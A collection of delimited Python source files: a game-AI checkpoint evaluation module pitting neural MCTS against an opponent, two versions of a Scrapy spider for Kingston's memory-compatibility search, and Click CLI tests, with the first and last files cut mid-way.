        eval_batch_size = eval_params.num_parallel_games_eval if eval_params.num_parallel_games_eval else eval_params.num_game_eval
        print("evaluating {} games with batches of size {}".format(eval_params.num_game_eval, eval_batch_size))
        while num_evaluated_games < eval_params.num_game_eval:
            if eval_params.eval_verbosity:
                print("creating evaluation environment...")
            current_batch_size = min(eval_batch_size, eval_params.num_game_eval - num_evaluated_games)
            (
                context,
                actor_channel_eval,
                actor_channel_opponent,
                get_eval_reward,
            ) = create_evaluation_environment(
                seed_generator=seed_generator,
                game_params=game_params,
                eval_params=eval_params,
                current_batch_size=current_batch_size,
                pure_mcts_eval=pure_mcts_eval,
                pure_mcts_opponent=pure_mcts_opponent,
                num_evaluated_games=num_evaluated_games,
            )
            if eval_params.eval_verbosity:
                print("evaluating...")
            partial_result = evaluate_on_checkpoint(
                game_params=game_params,
                eval_params=eval_params,
                context=context,
                actor_channel_eval=actor_channel_eval,
                actor_channel_opponent=actor_channel_opponent,
                get_eval_reward=get_eval_reward,
                devices_eval=devices_eval,
                models_eval=models_eval,
                pure_mcts_eval=pure_mcts_eval,
                devices_opponent=devices_opponent,
                models_opponent=models_opponent,
                pure_mcts_opponent=pure_mcts_opponent,
            )
            num_evaluated_games += current_batch_size
            rewards += partial_result.reward
            elapsed_time = time.time() - start_time
            print(f"Evaluated on {num_evaluated_games} games in : {elapsed_time} s")
        result = utils.Result(rewards)
        print("@@@eval: %s" % result.log())
        results.append((epoch, result))
        if eval_params.plot_enabled:
            print("plotting...")
            plotter.plot_results(results)
            plotter.save()
    elapsed_time = time.time() - start_time
    print(f"total time: {elapsed_time} s")
| # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import sys
import time
from concurrent.futures import ThreadPoolExecutor
from typing import Iterator, Tuple, List, Callable, Optional, Dict
import torch
import tube
from pytube.data_channel_manager import DataChannelManager
from .params import GameParams, EvalParams, ExecutionParams
from . import utils
from .env_creation_helpers import (
sanitize_game_params,
create_model,
create_game,
create_player,
)
#######################################################################################
# PLOTTER CREATION
#######################################################################################
def create_plotter(eval_params: EvalParams) -> utils.Plotter:
    """Build a Plotter whose plot environment is named after the checkpoint directory."""
    directory = eval_params.checkpoint_dir
    # Drop a single trailing slash so basename() yields the directory name.
    if directory[-1] == "/":
        directory = directory[:-1]
    return utils.Plotter(
        plot_enabled=eval_params.plot_enabled,
        env=os.path.basename(directory),
        server=eval_params.plot_server,
        port=eval_params.plot_port,
    )
#######################################################################################
# CHECKPOINT ITERATOR CREATION
#######################################################################################
def create_checkpoint_iter(eval_params: EvalParams, only_last: bool = False):
    """Return the checkpoints to evaluate.

    With a checkpoint directory, stream checkpoints from it; otherwise load
    the single explicit checkpoint.
    """
    if eval_params.checkpoint_dir is None:
        return [utils.load_checkpoint(eval_params.checkpoint)]
    return utils.gen_checkpoints(
        checkpoint_dir=eval_params.checkpoint_dir,
        real_time=eval_params.real_time and not only_last,
        only_last=only_last,
    )
#######################################################################################
# OPPONENT MODEL AND DEVICE CREATION
#######################################################################################
def create_models_and_devices_opponent(
    eval_params: EvalParams
) -> Tuple[List[torch.jit.ScriptModule], List[torch.device], GameParams]:
    """Load the opponent checkpoint and build one eval-mode model per opponent device.

    Returns (models, devices, game_params) for the opponent side.
    """
    devices = [torch.device(name) for name in eval_params.device_opponent]
    checkpoint = utils.load_checkpoint(eval_params.checkpoint_opponent)
    state_dict = checkpoint["model_state_dict"]
    game_params = checkpoint["game_params"]
    sanitize_game_params(game_params)
    model_params = checkpoint["model_params"]
    models = []
    for device in devices:
        model = create_model(
            game_params=game_params,
            model_params=model_params,
            resume_training=False,
        ).to(device)
        # Drop training-only entries so the state dict matches the eval model.
        for key in [k for k in state_dict if "training" in k]:
            state_dict.pop(key)
        model.load_state_dict(state_dict)
        model.eval()
        models.append(model)
    return models, devices, game_params
#######################################################################################
# EVALUATION ENVIRONMENT CREATION
#######################################################################################
def create_evaluation_environment(
    seed_generator: Iterator[int],
    game_params: GameParams,
    eval_params: EvalParams,
    current_batch_size: int = None,
    pure_mcts_eval: bool = False,
    pure_mcts_opponent: bool = True,
    num_evaluated_games: int = 0
) -> Tuple[
    tube.Context,
    Optional[tube.DataChannel],
    Optional[tube.DataChannel],
    Callable[[], List[int]],
]:
    """Create one batch of evaluation games plus the channels that drive them.

    Returns the tube context holding the game threads, the eval and opponent
    actor channels (None for a pure-MCTS side, which needs no NN inference),
    and a zero-argument callable that collects the evaluated player's reward
    from every game once the context has terminated.
    """
    num_game = eval_params.num_game_eval
    num_actor_eval = eval_params.num_actor_eval
    num_rollouts_eval = eval_params.num_rollouts_eval
    num_actor_opponent = eval_params.num_actor_opponent
    num_rollouts_opponent = eval_params.num_rollouts_opponent
    # Games where the evaluated player moves first vs. second; its reward sits
    # at result index 0 or 1 respectively (see get_eval_reward below).
    first_hand = []
    second_hand = []
    games = []
    context = tube.Context()
    # A data channel is only needed when the corresponding side is NN-powered.
    actor_channel_eval = (
        None
        if pure_mcts_eval
        else tube.DataChannel("act_eval", num_game * num_actor_eval, 1)
    )
    actor_channel_opponent = (
        None
        if pure_mcts_opponent
        else tube.DataChannel("act_opponent", num_game * num_actor_opponent, 1)
    )
    for game_no in range(current_batch_size if current_batch_size else num_game):
        game = create_game(
            game_params, num_episode=1, seed=next(seed_generator), eval_mode=True
        )
        player = create_player(
            seed_generator=seed_generator,
            game=game,
            player="mcts",
            num_actor=num_actor_eval,
            num_rollouts=num_rollouts_eval,
            pure_mcts=pure_mcts_eval,
            actor_channel=actor_channel_eval,
            model_manager=None,
            human_mode=False,
            sample_before_step_idx=8,
            randomized_rollouts=False,
            sampling_mcts=False,
        )
        if game.is_one_player_game():
            game.add_eval_player(player)
            first_hand.append(game)
        else:
            opponent = create_player(
                seed_generator=seed_generator,
                game=game,
                player="mcts",
                num_actor=num_actor_opponent,
                num_rollouts=num_rollouts_opponent,
                pure_mcts=pure_mcts_opponent,
                actor_channel=actor_channel_opponent,
                model_manager=None,
                human_mode=False,
                sample_before_step_idx=8,
                randomized_rollouts=False,
                sampling_mcts=False,
            )
            # Alternate seats over the whole evaluation (not just this batch)
            # so the result is not biased by who moves first.
            game_id = num_evaluated_games + game_no
            if player_moves_first(game_id, num_game):
                game.add_eval_player(player)
                game.add_eval_player(opponent)
                first_hand.append(game)
            else:
                game.add_eval_player(opponent)
                game.add_eval_player(player)
                second_hand.append(game)
        context.push_env_thread(game)
        games.append(game)

    def get_eval_reward():
        # Pick the evaluated player's reward: seat 0 when it moved first,
        # seat 1 when it moved second.
        nonlocal first_hand, second_hand
        reward = []
        for hand in first_hand:
            reward.append(hand.get_result()[0])
        for hand in second_hand:
            reward.append(hand.get_result()[1])
        return reward

    return context, actor_channel_eval, actor_channel_opponent, get_eval_reward
def player_moves_first(game_id, num_games_eval):
    """The evaluated player opens the first half of the games; the opponent opens the rest."""
    half = num_games_eval // 2
    return game_id < half
#######################################################################################
# EVALUATION
#######################################################################################
def _forward_pass_on_device(
    device: torch.device, model: torch.jit.ScriptModule, batch_s: torch.Tensor
) -> Dict[str, torch.Tensor]:
    """Move batch_s to device and run one gradient-free forward pass of model."""
    inputs = utils.to_device(batch_s, device)
    with torch.no_grad():
        return model(inputs)
def _play_game_neural_mcts_against_pure_mcts_opponent(
    context: tube.Context,
    actor_channel_eval: tube.DataChannel,
    devices_eval: List[torch.device],
    models_eval: List[torch.jit.ScriptModule],
) -> None:
    """Serve NN inference for the evaluated player until every game finishes.

    The pure-MCTS opponent needs no network, so only the eval channel is
    polled. Each incoming batch of states is chunked across the eval devices,
    evaluated in parallel threads, and the concatenated (v, pi_logit) reply is
    sent back on the channel.
    """
    nb_devices_eval = len(devices_eval)
    context.start()
    dcm = DataChannelManager([actor_channel_eval])
    while not context.terminated():
        # Poll with a timeout so loop termination is re-checked regularly.
        batch = dcm.get_input(max_timeout_s=1)
        if len(batch) == 0:
            continue
        assert len(batch) == 1  # only one channel
        # split in as many part as there are devices
        batches_eval_s = torch.chunk(
            batch[actor_channel_eval.name]["s"], nb_devices_eval, dim=0
        )
        futures = []
        reply_eval = {"v": None, "pi_logit": None}
        # multithread
        with ThreadPoolExecutor(max_workers=nb_devices_eval) as executor:
            for device, model, batch_s in zip(
                devices_eval, models_eval, batches_eval_s
            ):
                futures.append(
                    executor.submit(_forward_pass_on_device, device, model, batch_s)
                )
        # Reassemble per-device outputs in submission order so rows line up
        # with the original batch.
        results = [future.result() for future in futures]
        reply_eval["v"] = torch.cat([result["v"] for result in results], dim=0)
        reply_eval["pi_logit"] = torch.cat([result["pi_logit"] for result in results], dim=0)
        dcm.set_reply(actor_channel_eval.name, reply_eval)
    dcm.terminate()
def _play_game_neural_mcts_against_neural_mcts_opponent(
    context: tube.Context,
    actor_channel_eval: tube.DataChannel,
    actor_channel_opponent: tube.DataChannel,
    devices_eval: List[torch.device],
    models_eval: List[torch.jit.ScriptModule],
    devices_opponent: List[torch.device],
    models_opponent: List[torch.jit.ScriptModule],
) -> None:
    """Serve neural-network inference for both the evaluated player and a
    NN-powered opponent until the evaluation context terminates.

    The original implementation duplicated the shard/forward/concatenate/
    reply logic once per channel; that common logic now lives in the nested
    `_serve_channel` helper so both channels share one code path.
    """

    def _serve_channel(
        channel_batch: Dict[str, torch.Tensor],
        channel: tube.DataChannel,
        devices: List[torch.device],
        models: List[torch.jit.ScriptModule],
    ) -> None:
        # Shard the batched states across the devices, run the forward
        # passes concurrently, then stitch the replies back together in
        # the original order before answering the channel.
        shards = torch.chunk(channel_batch["s"], len(devices), dim=0)
        with ThreadPoolExecutor(max_workers=len(devices)) as pool:
            results = list(pool.map(_forward_pass_on_device, devices, models, shards))
        reply = {
            "v": torch.cat([result["v"] for result in results], dim=0),
            "pi_logit": torch.cat([result["pi_logit"] for result in results], dim=0),
        }
        dcm.set_reply(channel.name, reply)

    context.start()
    dcm = DataChannelManager([actor_channel_eval, actor_channel_opponent])
    while not context.terminated():
        batch = dcm.get_input(max_timeout_s=1)
        if len(batch) == 0:
            continue
        assert len(batch) <= 2  # up to two channels
        if actor_channel_eval.name in batch:
            _serve_channel(
                batch[actor_channel_eval.name],
                actor_channel_eval,
                devices_eval,
                models_eval,
            )
        if actor_channel_opponent.name in batch:
            _serve_channel(
                batch[actor_channel_opponent.name],
                actor_channel_opponent,
                devices_opponent,
                models_opponent,
            )
    dcm.terminate()
def evaluate_on_checkpoint(
    game_params: GameParams,
    eval_params: EvalParams,
    context: tube.Context,
    actor_channel_eval: Optional[tube.DataChannel],
    actor_channel_opponent: Optional[tube.DataChannel],
    get_eval_reward: Callable[[], List[int]],
    devices_eval: Optional[List[torch.device]],
    models_eval: Optional[List[torch.jit.ScriptModule]],
    pure_mcts_eval: bool,
    devices_opponent: Optional[List[torch.device]],
    models_opponent: Optional[List[torch.jit.ScriptModule]],
    pure_mcts_opponent: bool,
) -> utils.Result:
    """Play one batch of evaluation games and return the aggregated result.

    Dispatches to the serving loop that matches the opponent type, then
    collects the per-game rewards via `get_eval_reward`.
    """
    if eval_params.eval_verbosity:
        player_label = (
            "pure MCTS" if pure_mcts_eval else type(models_eval[0]).__name__
        )
        opponent_label = (
            "pure MCTS" if pure_mcts_opponent else type(models_opponent[0]).__name__
        )
        print(f"Playing {eval_params.num_game_eval} games of {game_params.game_name}:")
        print(
            f"- {player_label} "
            f"player uses "
            f"{eval_params.num_rollouts_eval} rollouts per actor "
            f"with {eval_params.num_actor_eval} "
            f"actor{'s' if eval_params.num_actor_eval > 1 else ''}"
        )
        print(
            f"- {opponent_label} "
            f"opponent uses "
            f"{eval_params.num_rollouts_opponent} rollouts per actor "
            f"with {eval_params.num_actor_opponent} "
            f"actor{'s' if eval_params.num_actor_opponent > 1 else ''}"
        )
    # A pure-MCTS evaluated player needs no NN serving loop (not implemented).
    if not pure_mcts_eval:
        if pure_mcts_opponent:
            _play_game_neural_mcts_against_pure_mcts_opponent(
                context=context,
                actor_channel_eval=actor_channel_eval,
                devices_eval=devices_eval,
                models_eval=models_eval,
            )
        else:
            _play_game_neural_mcts_against_neural_mcts_opponent(
                context=context,
                actor_channel_eval=actor_channel_eval,
                actor_channel_opponent=actor_channel_opponent,
                devices_eval=devices_eval,
                models_eval=models_eval,
                devices_opponent=devices_opponent,
                models_opponent=models_opponent,
            )
    result = utils.Result(get_eval_reward())
    if eval_params.eval_verbosity >= 2:
        print("@@@eval: %s" % result.log())
    return result
#######################################################################################
# OVERALL EVALUATION WORKFLOW
#######################################################################################
def run_evaluation(eval_params: EvalParams, execution_params: ExecutionParams, only_last: bool = False) -> None:
    """Evaluate every checkpoint (or only the last one) against the opponent.

    For each checkpoint: load the model weights, play `num_game_eval` games
    in batches of `num_parallel_games_eval`, aggregate the rewards, and
    optionally plot the per-epoch results. Stdout is redirected to an
    `eval.log` next to the checkpoint(s).

    Fix: the game-parameter mismatch error message previously concatenated
    two literals without a separating space ("testedand").
    """
    start_time = time.time()
    logger_dir = eval_params.checkpoint_dir
    if eval_params.checkpoint_dir is None:
        logger_dir = os.path.dirname(eval_params.checkpoint)
    logger_path = os.path.join(logger_dir, "eval.log")
    # tee all prints into the eval log file
    sys.stdout = utils.Logger(logger_path)
    print("#" * 70)
    print("#" + "EVALUATION".center(68) + "#")
    print("#" * 70)
    # evaluation is done on a NN-powered MCTS
    pure_mcts_eval = False
    print("setting-up pseudo-random generator...")
    seed_generator = utils.generate_random_seeds(seed=eval_params.seed_eval)
    if eval_params.plot_enabled:
        print("creating plotter...")
        plotter = create_plotter(eval_params=eval_params)
    print("finding checkpoints...")
    checkpoint_iter = create_checkpoint_iter(
        eval_params=eval_params, only_last=only_last
    )
    # the opponent is a pure MCTS unless an opponent checkpoint is given
    models_opponent = []
    pure_mcts_opponent = True
    devices_opponent = None
    game_params_opponent = None
    if eval_params.checkpoint_opponent is not None:
        print("creating opponent model(s) and device(s)...")
        pure_mcts_opponent = False
        (
            models_opponent,
            devices_opponent,
            game_params_opponent,
        ) = create_models_and_devices_opponent(eval_params=eval_params)
    results = []
    # NOTE(review): despite its name this flag means "eval models already
    # built" — it flips to True after the first iteration.
    first_checkpoint = False
    game_params = None
    for checkpoint in checkpoint_iter:
        epoch = checkpoint.get("epoch", 0)  # 0 when checkpoint_dir is None
        model_state_dict_eval = checkpoint["model_state_dict"]
        model_params_eval = checkpoint["model_params"]
        if game_params is None:
            game_params = checkpoint["game_params"]
            sanitize_game_params(game_params)
        # check that game_params are consistent between the model_eval and
        # the model_opponent
        if game_params_opponent is not None and game_params != game_params_opponent:
            raise ValueError(
                "The game parameters between the model to be tested "
                "and the opponent model are different"
            )
        # check that game_params are consistent from one epoch to the other
        checkpoint_game_params = checkpoint["game_params"]
        sanitize_game_params(checkpoint_game_params)
        if game_params != checkpoint_game_params:
            raise ValueError(f"The game parameters have changed at checkpoint #{epoch}")
        if not first_checkpoint:
            # build the eval models once; later checkpoints only reload weights
            print("creating model(s) and device(s)...")
            devices_eval = [
                torch.device(device_eval) for device_eval in eval_params.device_eval
            ]
            models_eval = []
            for device_eval in devices_eval:
                models_eval.append(
                    create_model(
                        game_params=game_params,
                        model_params=model_params_eval,
                        resume_training=False,
                    ).to(device_eval)
                )
            first_checkpoint = True
        print("updating model(s)...")
        for model_eval in models_eval:
            model_eval.load_state_dict(model_state_dict_eval)
            model_eval.eval()
        num_evaluated_games = 0
        rewards = []
        # 0/None num_parallel_games_eval means "play everything in one batch"
        eval_batch_size = eval_params.num_parallel_games_eval if eval_params.num_parallel_games_eval else eval_params.num_game_eval
        print("evaluating {} games with batches of size {}".format(eval_params.num_game_eval, eval_batch_size))
        while num_evaluated_games < eval_params.num_game_eval:
            if eval_params.eval_verbosity:
                print("creating evaluation environment...")
            # last batch may be smaller than eval_batch_size
            current_batch_size = min(eval_batch_size, eval_params.num_game_eval - num_evaluated_games)
            (
                context,
                actor_channel_eval,
                actor_channel_opponent,
                get_eval_reward,
            ) = create_evaluation_environment(
                seed_generator=seed_generator,
                game_params=game_params,
                eval_params=eval_params,
                current_batch_size=current_batch_size,
                pure_mcts_eval=pure_mcts_eval,
                pure_mcts_opponent=pure_mcts_opponent,
                num_evaluated_games=num_evaluated_games,
            )
            if eval_params.eval_verbosity:
                print("evaluating...")
            partial_result = evaluate_on_checkpoint(
                game_params=game_params,
                eval_params=eval_params,
                context=context,
                actor_channel_eval=actor_channel_eval,
                actor_channel_opponent=actor_channel_opponent,
                get_eval_reward=get_eval_reward,
                devices_eval=devices_eval,
                models_eval=models_eval,
                pure_mcts_eval=pure_mcts_eval,
                devices_opponent=devices_opponent,
                models_opponent=models_opponent,
                pure_mcts_opponent=pure_mcts_opponent,
            )
            num_evaluated_games += current_batch_size
            rewards += partial_result.reward
            elapsed_time = time.time() - start_time
            print(f"Evaluated on {num_evaluated_games} games in : {elapsed_time} s")
        result = utils.Result(rewards)
        print("@@@eval: %s" % result.log())
        results.append((epoch, result))
        if eval_params.plot_enabled:
            # plot the cumulative (epoch, result) history after each checkpoint
            print("plotting...")
            plotter.plot_results(results)
            plotter.save()
    elapsed_time = time.time() - start_time
    print(f"total time: {elapsed_time} s")
|
import json
import scrapy
from kingston.items import *
class ManufacturerSpider(scrapy.Spider):
    """Get all compatible memory for all motherboards from certain manufacturer.

    Fixes:
    - the search URL f-string reused the outer double quotes
      (``{data["Value"]}``), which is a SyntaxError before Python 3.12
      (PEP 701) — single quotes are used instead;
    - ``super().__init__()`` is now called so scrapy.Spider finishes its
      own setup (accepts and forwards extra scrapy kwargs).
    """

    name = 'manufacturer'
    allowed_domains = [
        'kingston.com',
        'www.kingston.com',
    ]
    start_urls = [
        'https://kingston.com/',
    ]
    # Kingston's manufacturer id, supplied on the command line
    # via `-a manufacturer=<id>`.
    manufacturer = None

    def __init__(self, manufacturer: str = "", **kwargs):
        """Store the manufacturer id.

        Raises:
            ValueError: if no manufacturer id was supplied.
        """
        super().__init__(**kwargs)
        if not manufacturer:
            raise ValueError("Invalid manufacturer given")
        self.manufacturer = manufacturer
        self.start_urls = ['https://www.kingston.com/en']

    def parse(self, response: scrapy.http.Response):
        """
        POST to get a list of manufacturer's motherboard models
        """
        yield scrapy.FormRequest(
            'https://www.kingston.com/en/memorysearch/ajax/getlines',
            callback=self.POST_parse_models,
            formdata={
                # category id used by the site's search form — TODO confirm meaning
                'systemCategoryId': '7',
                'manufacturerId': self.manufacturer,
                'discontinued': 'false',
            },
            meta={
                'manufacturerId': self.manufacturer,
            },
        )

    def POST_parse_models(self, response: scrapy.http.Response):
        """
        List models and meta information
        """
        # the reply is a JSON array of {"Value": <model line>, ...} entries
        for model in json.loads(response.body):
            yield scrapy.FormRequest(
                'https://www.kingston.com/en/memorysearch/ajax/getmodels',
                callback=self.POST_parse_model,
                formdata={
                    'systemCategoryId': '7',
                    'manufacturerId': self.manufacturer,
                    'systemLine': model['Value'],
                    'discontinued': 'false',
                },
                meta={
                    'manufacturerId': self.manufacturer,
                    'systemLine': model['Value'],
                },
            )

    def POST_parse_model(self, response: scrapy.http.Response):
        """
        Get model's meta information
        """
        data = json.loads(response.body)[0]
        # single quotes inside the f-string: reusing the outer double quotes
        # requires Python >= 3.12 (PEP 701)
        yield scrapy.Request(
            f"https://www.kingston.com/en/memory/search?model={data['Value']}&mfr={self.manufacturer}",
            callback=self.parse_memory,
            meta={
                'manufacturerId': self.manufacturer,
                'model': data['Value'],
                'systemLine': response.meta['systemLine'],
            },
        )

    def parse_memory(self, response: scrapy.http.Response):
        """
        Get compatible memory modules for certain motherboard
        """
        # key/value rows of the board's product-details table
        prodinfo = {}
        for info in response.xpath("//div[@class='c-table__main_disable']/table/tr"):
            k = info.xpath("./td[1]/text()").get().strip()
            v = "".join(info.xpath("./td[2]//text()").getall()).strip()
            prodinfo[k] = v
        compatible_modules = Memory({
            "_url": response.url,
            "_manufacturer": response.meta['manufacturerId'],
            "_model": response.meta['systemLine'],
            "_product": prodinfo,
        })
        for section in response.xpath("//section[contains(@class, 'section-product_gallery')][@id]"):
            # Iterate each section which lists compatible products such as memory, SSDs, etc..
            # title is for example "ValueRAM Server Premier"
            title = section.xpath(".//h2/text()").get().strip()
            if "RAM" not in title:
                # We're not interested in SSDs and such
                continue
            compatible_modules[title] = []
            for memmodule in section.xpath("./ul[contains(@class, 'c-productGallery')]/li"):
                # List each memory module
                name = memmodule.xpath("./@data-pn").get()
                moduleinfo = {
                    "_name": name,
                }
                for infoline in memmodule.xpath(".//div[@class='c-productCard__body__details']/ul/li"):
                    # List each memory module's specification line
                    txt = "".join(infoline.xpath(".//text()").getall()).strip()
                    if txt == 'PCN':
                        # Product change notify, ignore
                        continue
                    elif 'Spec Sheet PDF' in txt:
                        # PDF link
                        moduleinfo[txt] = infoline.xpath(".//a/@href").get()
                    else:
                        if ':' not in txt:
                            continue
                        # for example "Part Number: KVR24N17D8/16"
                        k, v = txt.split(": ", 1)
                        if 'Specs' in k:
                            # for example "DDR4, 2400MHz, Non-ECC, CL17, 1.2V, Unbuffered, DIMM"
                            v = v.split(", ")
                        moduleinfo[k] = v
                compatible_modules[title].append(moduleinfo)
        yield compatible_modules
| import json
import scrapy
from kingston.items import *
class ManufacturerSpider(scrapy.Spider):
    """Crawl Kingston's memory-search pages and yield every compatible
    memory module for each motherboard of one manufacturer.
    """

    name = 'manufacturer'
    allowed_domains = [
        'kingston.com',
        'www.kingston.com',
    ]
    start_urls = [
        'https://kingston.com/',
    ]
    manufacturer = None

    def __init__(self, manufacturer: str = ""):
        # an empty or missing manufacturer id cannot be queried
        if manufacturer in ("", None):
            raise ValueError("Invalid manufacturer given")
        self.manufacturer = manufacturer
        self.start_urls = ['https://www.kingston.com/en']

    def parse(self, response: scrapy.http.Response):
        """Kick off the AJAX POST listing the manufacturer's model lines."""
        yield scrapy.FormRequest(
            'https://www.kingston.com/en/memorysearch/ajax/getlines',
            callback=self.POST_parse_models,
            formdata={
                'systemCategoryId': '7',
                'manufacturerId': self.manufacturer,
                'discontinued': 'false',
            },
            meta={'manufacturerId': self.manufacturer},
        )

    def POST_parse_models(self, response: scrapy.http.Response):
        """Fan out one getmodels request per model line in the JSON reply."""
        for line in json.loads(response.body):
            line_value = line['Value']
            yield scrapy.FormRequest(
                'https://www.kingston.com/en/memorysearch/ajax/getmodels',
                callback=self.POST_parse_model,
                formdata={
                    'systemCategoryId': '7',
                    'manufacturerId': self.manufacturer,
                    'systemLine': line_value,
                    'discontinued': 'false',
                },
                meta={
                    'manufacturerId': self.manufacturer,
                    'systemLine': line_value,
                },
            )

    def POST_parse_model(self, response: scrapy.http.Response):
        """Follow the first returned model to its compatible-memory page."""
        first_model = json.loads(response.body)[0]
        model_value = first_model['Value']
        search_url = (
            f"https://www.kingston.com/en/memory/search"
            f"?model={model_value}&mfr={self.manufacturer}"
        )
        yield scrapy.Request(
            search_url,
            callback=self.parse_memory,
            meta={
                'manufacturerId': self.manufacturer,
                'model': model_value,
                'systemLine': response.meta['systemLine'],
            },
        )

    def parse_memory(self, response: scrapy.http.Response):
        """Build and yield the Memory item for one motherboard page."""
        # key/value rows of the board's product-details table
        product_details = {}
        for row in response.xpath("//div[@class='c-table__main_disable']/table/tr"):
            label = row.xpath("./td[1]/text()").get().strip()
            text = "".join(row.xpath("./td[2]//text()").getall()).strip()
            product_details[label] = text
        item = Memory({
            "_url": response.url,
            "_manufacturer": response.meta['manufacturerId'],
            "_model": response.meta['systemLine'],
            "_product": product_details,
        })
        galleries = response.xpath(
            "//section[contains(@class, 'section-product_gallery')][@id]"
        )
        for section in galleries:
            # each gallery section covers one product family; the h2 names it
            heading = section.xpath(".//h2/text()").get().strip()
            if "RAM" not in heading:
                # skip non-memory galleries such as SSDs
                continue
            item[heading] = []
            for card in section.xpath("./ul[contains(@class, 'c-productGallery')]/li"):
                module = {"_name": card.xpath("./@data-pn").get()}
                for detail in card.xpath(".//div[@class='c-productCard__body__details']/ul/li"):
                    text = "".join(detail.xpath(".//text()").getall()).strip()
                    if text == 'PCN':
                        # product-change-notification link, ignore
                        continue
                    if 'Spec Sheet PDF' in text:
                        # keep the PDF link itself
                        module[text] = detail.xpath(".//a/@href").get()
                        continue
                    if ':' not in text:
                        continue
                    # e.g. "Part Number: KVR24N17D8/16"
                    key, value = text.split(": ", 1)
                    if 'Specs' in key:
                        # e.g. "DDR4, 2400MHz, Non-ECC, CL17, 1.2V, Unbuffered, DIMM"
                        value = value.split(", ")
                    module[key] = value
                item[heading].append(module)
        yield item
|
import re
import click
def test_other_command_invoke(runner):
    """ctx.invoke forwards keyword arguments to another command's callback."""
    @click.command()
    @click.pass_context
    def cli(ctx):
        # call the sibling command with an explicit argument value
        return ctx.invoke(other_cmd, arg=42)

    @click.command()
    @click.argument("arg", type=click.INT)
    def other_cmd(arg):
        click.echo(arg)

    result = runner.invoke(cli, [])
    assert not result.exception
    assert result.output == "42\n"
def test_other_command_forward(runner):
    """ctx.forward re-uses the caller's params; ctx.invoke takes explicit ones."""
    cli = click.Group()

    @cli.command()
    @click.option("--count", default=1)
    def test(count):
        click.echo(f"Count: {count:d}")

    @cli.command()
    @click.option("--count", default=1)
    @click.pass_context
    def dist(ctx, count):
        # forward passes dist's own --count (default 1); invoke overrides it
        ctx.forward(test)
        ctx.invoke(test, count=42)

    result = runner.invoke(cli, ["dist"])
    assert not result.exception
    assert result.output == "Count: 1\nCount: 42\n"
def test_forwarded_params_consistency(runner):
    """A forwarded context exposes the same params dict as the forwarding one."""
    cli = click.Group()

    @cli.command()
    @click.option("-a")
    @click.pass_context
    def first(ctx, **kwargs):
        click.echo(f"{ctx.params}")

    @cli.command()
    @click.option("-a")
    @click.option("-b")
    @click.pass_context
    def second(ctx, **kwargs):
        click.echo(f"{ctx.params}")
        ctx.forward(first)

    result = runner.invoke(cli, ["second", "-a", "foo", "-b", "bar"])
    assert not result.exception
    assert result.output == "{'a': 'foo', 'b': 'bar'}\n{'a': 'foo', 'b': 'bar'}\n"
def test_auto_shorthelp(runner):
    """Short help is derived from the docstring and truncated when too long."""
    @click.group()
    def cli():
        pass

    @cli.command()
    def short():
        """This is a short text."""

    @cli.command()
    def special_chars():
        """Login and store the token in ~/.netrc."""

    @cli.command()
    def long():
        """This is a long text that is too long to show as short help
        and will be truncated instead."""

    result = runner.invoke(cli, ["--help"])
    assert (
        re.search(
            r"Commands:\n\s+"
            r"long\s+This is a long text that is too long to show as short help"
            r"\.\.\.\n\s+"
            r"short\s+This is a short text\.\n\s+"
            r"special-chars\s+Login and store the token in ~/.netrc\.\s*",
            result.output,
        )
        is not None
    )
def test_no_args_is_help(runner):
    """no_args_is_help shows the help page with exit code 0 on empty argv."""
    @click.command(no_args_is_help=True)
    def cli():
        pass

    result = runner.invoke(cli, [])
    assert result.exit_code == 0
    assert "Show this message and exit." in result.output
def test_default_maps(runner):
    """default_map overrides option defaults per subcommand."""
    @click.group()
    def cli():
        pass

    @cli.command()
    @click.option("--name", default="normal")
    def foo(name):
        click.echo(name)

    result = runner.invoke(cli, ["foo"], default_map={"foo": {"name": "changed"}})
    assert not result.exception
    assert result.output == "changed\n"
def test_group_with_args(runner):
    """A group taking an argument still shows help and requires a subcommand."""
    @click.group()
    @click.argument("obj")
    def cli(obj):
        click.echo(f"obj={obj}")

    @cli.command()
    def move():
        click.echo("move")

    # no arguments at all: help page, success
    result = runner.invoke(cli, [])
    assert result.exit_code == 0
    assert "Show this message and exit." in result.output

    # argument given but no subcommand: usage error
    result = runner.invoke(cli, ["obj1"])
    assert result.exit_code == 2
    assert "Error: Missing command." in result.output

    result = runner.invoke(cli, ["obj1", "--help"])
    assert result.exit_code == 0
    assert "Show this message and exit." in result.output

    result = runner.invoke(cli, ["obj1", "move"])
    assert result.exit_code == 0
    assert result.output == "obj=obj1\nmove\n"
def test_base_command(runner):
    """A custom BaseCommand can wrap an optparse parser inside a click group.

    Fix: parse_args used the module-level `parser` captured by closure
    instead of the instance's own `self.parser`.
    """
    import optparse

    @click.group()
    def cli():
        pass

    class OptParseCommand(click.BaseCommand):
        def __init__(self, name, parser, callback):
            super().__init__(name)
            self.parser = parser
            self.callback = callback

        def parse_args(self, ctx, args):
            try:
                # use the parser handed to the constructor, not the outer
                # `parser` variable captured through the closure
                opts, args = self.parser.parse_args(args)
            except Exception as e:
                ctx.fail(str(e))
            ctx.args = args
            ctx.params = vars(opts)

        def get_usage(self, ctx):
            return self.parser.get_usage()

        def get_help(self, ctx):
            return self.parser.format_help()

        def invoke(self, ctx):
            ctx.invoke(self.callback, ctx.args, **ctx.params)

    parser = optparse.OptionParser(usage="Usage: foo test [OPTIONS]")
    parser.add_option(
        "-f", "--file", dest="filename", help="write report to FILE", metavar="FILE"
    )
    parser.add_option(
        "-q",
        "--quiet",
        action="store_false",
        dest="verbose",
        default=True,
        help="don't print status messages to stdout",
    )

    def test_callback(args, filename, verbose):
        click.echo(" ".join(args))
        click.echo(filename)
        click.echo(verbose)

    cli.add_command(OptParseCommand("test", parser, test_callback))

    result = runner.invoke(
        cli, ["test", "-f", "test.txt", "-q", "whatever.txt", "whateverelse.txt"]
    )
    assert not result.exception
    assert result.output.splitlines() == [
        "whatever.txt whateverelse.txt",
        "test.txt",
        "False",
    ]

    result = runner.invoke(cli, ["test", "--help"])
    assert not result.exception
    assert result.output.splitlines() == [
        "Usage: foo test [OPTIONS]",
        "",
        "Options:",
        " -h, --help show this help message and exit",
        " -f FILE, --file=FILE write report to FILE",
        " -q, --quiet don't print status messages to stdout",
    ]
def test_object_propagation(runner):
    """ctx.obj set in the group callback is visible in subcommands, chained or not.

    Fix: the f-string reused the outer double quotes inside its replacement
    field, which is a SyntaxError before Python 3.12 (PEP 701).
    """
    for chain in False, True:

        @click.group(chain=chain)
        @click.option("--debug/--no-debug", default=False)
